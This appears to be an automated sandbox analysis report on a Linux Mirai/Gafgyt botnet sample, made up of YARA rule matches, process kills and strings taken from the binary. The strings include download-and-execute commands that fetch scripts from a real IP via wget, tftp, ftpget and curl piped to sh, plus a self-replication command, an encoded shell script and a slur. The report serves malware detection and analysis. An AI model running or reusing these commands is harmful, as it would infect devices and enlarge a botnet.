Source: x86_32.nn.elf, profile.12.dr, system.12.dr, inittab.12.dr, sh.42.dr, bootcmd.12.dr, custom.service.12.dr	String found in binary or memory: http://94.156.227.233/
Source: x86_32.nn.elf	String found in binary or memory: http://94.156.227.233/curl.sh
Source: x86_32.nn.elf	String found in binary or memory: http://94.156.227.233/lol.sh
Source: x86_32.nn.elf	String found in binary or memory: http://94.156.227.233/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/s

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 33606
Source: unknown	Network traffic detected: HTTP traffic on port 33606 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 43928 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 42836 -> 443

System Summary

Malicious sample detected (through community Yara rule)

Source: x86_32.nn.elf, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: x86_32.nn.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_fa3ad9d0 Author: unknown
Source: x86_32.nn.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: x86_32.nn.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: x86_32.nn.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: x86_32.nn.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: x86_32.nn.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: x86_32.nn.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6232.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 6232.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_fa3ad9d0 Author: unknown
Source: 6232.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6232.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 6232.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6232.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6232.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6232.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6335.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 6335.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_fa3ad9d0 Author: unknown
Source: 6335.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6335.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 6335.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6335.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6335.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6335.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6241.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 6241.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_fa3ad9d0 Author: unknown
Source: 6241.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6241.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 6241.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6241.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6241.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6241.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6339.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 6339.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_fa3ad9d0 Author: unknown
Source: 6339.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6339.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 6339.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6339.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6339.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6339.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown

Source: Initial sample	String containing 'busybox' found: /bin/busybox
Source: Initial sample	String containing 'busybox' found: getinfo xxxNIGGERNIGGERGETCOURRPERTEDDDDDDDDDDHAHAHAHAHAHAAHAHAHHAHAMDWHO??wasHeERe.BIGDADDYCATISURDAD!/proc/self/exe(deleted)/proc/%s/exe..%s/%s/proc//data/local/tmp//var/run/home/usr/bin/dev/dev/mnt/var/tmpsize=10Mtmpfs/tmp/tt/tmp/tt/system/proc/%d/proc/proc/%u/statusPPid:/proc/%u/cmdline-bash-sh/bin/sh487154914<146<2surf2/proc/%d/exe/ /.socket/proc/%d/mountinfo/usr/lib/systemd//usr/sbin//usr/sbin/agetty/usr/sbin/cron/usr/lib/policykit-1/polkitd/usr/bin/dbus-daemon/usr/lib/openssh/sftp-server-sshd*deamon/opt/app/monitor/z/secom//usr/lib/sys/media/srv/sbin/httpdtelnetddropbearencoder/var/tmp/wlancontarm.nnarm5.nnarm6.nnm68k.nnmips.nnmipsel.nnpowerpc.nnsparc.nnx86_32.nnx86_64.nn/initvar/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdvar/tmp/soniahicorestm_hi3511_dvr/bin/busybox/usr/lib/systemd/systemdhome/Davincissh/var/spool/var/Sofiasshd/usr/compress/bin//compress/bin/compress/usr//root/dvr_gui//root/dvr_app//anko-app//opt/wgetcurlping/pswiresharktcpdumpnetstatpyth
Source: Initial sample	String containing 'busybox' found: usage: busybox
Source: Initial sample	String containing 'busybox' found: /bin/busybox hostname PBOC
Source: Initial sample	String containing 'busybox' found: /bin/busybox echo >
Source: Initial sample	String containing 'busybox' found: /bin/busybox echo -ne
Source: Initial sample	String containing 'busybox' found: /bin/busybox wget http://94.156.227.233/lol.sh -O- \| sh;
Source: Initial sample	String containing 'busybox' found: /bin/busybox tftp -g http://94.156.227.233/ -r lol.sh -l- \| sh;
Source: Initial sample	String containing 'busybox' found: /bin/busybox ftpget http://94.156.227.233/ lol.sh lol.sh && sh lol.sh;
Source: Initial sample	String containing 'busybox' found: /bin/busybox chmod +x .d; ./.d; ./dvrHelper selfrep
Source: Initial sample	String containing 'busybox' found: incorrectinvalidbadwrongfaildeniederrorretryenablelinuxshellping ;shusage: busybox/bin/busybox hostname PBOC/bin/busybox echo > .b && sh .b && cd /bin/busybox echo -ne >> >sh .k94.156.227.233GET /dlr. HTTP/1.0
Source: Initial sample	String containing 'busybox' found: .dThe Gorilla/var//var/run//var/tmp//dev//dev/shm//etc//mnt//boot//home/armarm5arm6arm7mipsmpslppcspcsh4/bin/busybox wget http://94.156.227.233/lol.sh -O- \| sh;/bin/busybox tftp -g http://94.156.227.233/ -r lol.sh -l- \| sh;/bin/busybox ftpget http://94.156.227.233/ lol.sh lol.sh && sh lol.sh;curl http://94.156.227.233/curl.sh -o- \| sh/bin/busybox chmod +x .d; ./.d; ./dvrHelper selfrep"\x23\x21\x2F\x62\x69\x6E\x2F\x73\x68\x0A\x0A\x66\x6F\x72\x20\x70\x72\x6F\x63\x5F\x64\x69\x72\x20\x69\x6E\x20\x2F\x70\x72\x6F\x63""\x2F\x2A\x3B\x20\x64\x6F\x0A\x20\x20\x20\x20\x70\x69\x64\x3D\x24\x7B\x70\x72\x6F\x63\x5F\x64\x69\x72\x23\x23\x2A\x2F\x7D\x0A\x0A""\x20\x20\x20\x20\x72\x65\x73\x75\x6C\x74\x3D\x24\x28\x6C\x73\x20\x2D\x6C\x20\x22\x2F\x70\x72\x6F\x63\x2F\x24\x70\x69\x64\x2F\x65""\x78\x65\x22\x20\x32\x3E\x20\x2F\x64\x65\x76\x2F\x6E\x75\x6C\x6C\x29\x0A\x0A\x20\x20\x20\x20\x69\x66\x20\x5B\x20\x22\x24\x72\x65""\x73\x75\x6C\x74\x22\x20\x21\x3D\x20\x22\x24\x7B\x72\x65\x73\x75\x6C\x74\x25\x28\x64\x65\x6C\x65\x74\x65\x64\x29\x7

Source: ELF static info symbol of initial sample

.symtab present: no

Source: /tmp/x86_32.nn.elf (PID: 6241)	SIGKILL sent: pid: 788, result: successful	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 6241)	SIGKILL sent: pid: 884, result: successful	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 6241)	SIGKILL sent: pid: 1664, result: successful	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 6241)	SIGKILL sent: pid: 2096, result: successful	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 6241)	SIGKILL sent: pid: 2102, result: successful	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 6241)	SIGKILL sent: pid: 6292, result: successful	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 6241)	SIGKILL sent: pid: 6298, result: successful	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 6339)	SIGKILL sent: pid: 6335, result: successful	Jump to behavior

Source: x86_32.nn.elf, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: x86_32.nn.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_fa3ad9d0 reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = fe93a3552b72b107f95cc5a7e59da64fe84d31df833bf36c81d8f31d8d79d7ca, id = fa3ad9d0-7c55-4621-90fc-6b154c44a67b, last_modified = 2021-09-16
Source: x86_32.nn.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: x86_32.nn.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: x86_32.nn.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: x86_32.nn.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: x86_32.nn.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: x86_32.nn.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6232.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 6232.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_fa3ad9d0 reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = fe93a3552b72b107f95cc5a7e59da64fe84d31df833bf36c81d8f31d8d79d7ca, id = fa3ad9d0-7c55-4621-90fc-6b154c44a67b, last_modified = 2021-09-16
Source: 6232.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6232.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 6232.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6232.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6232.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6232.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6335.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 6335.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_fa3ad9d0 reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = fe93a3552b72b107f95cc5a7e59da64fe84d31df833bf36c81d8f31d8d79d7ca, id = fa3ad9d0-7c55-4621-90fc-6b154c44a67b, last_modified = 2021-09-16
Source: 6335.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6335.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 6335.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6335.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6335.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6335.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6241.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 6241.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_fa3ad9d0 reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = fe93a3552b72b107f95cc5a7e59da64fe84d31df833bf36c81d8f31d8d79d7ca, id = fa3ad9d0-7c55-4621-90fc-6b154c44a67b, last_modified = 2021-09-16
Source: 6241.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6241.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 6241.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6241.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6241.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6241.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6339.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 6339.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_fa3ad9d0 reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = fe93a3552b72b107f95cc5a7e59da64fe84d31df833bf36c81d8f31d8d79d7ca, id = fa3ad9d0-7c55-4621-90fc-6b154c44a67b, last_modified = 2021-09-16
Source: 6339.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
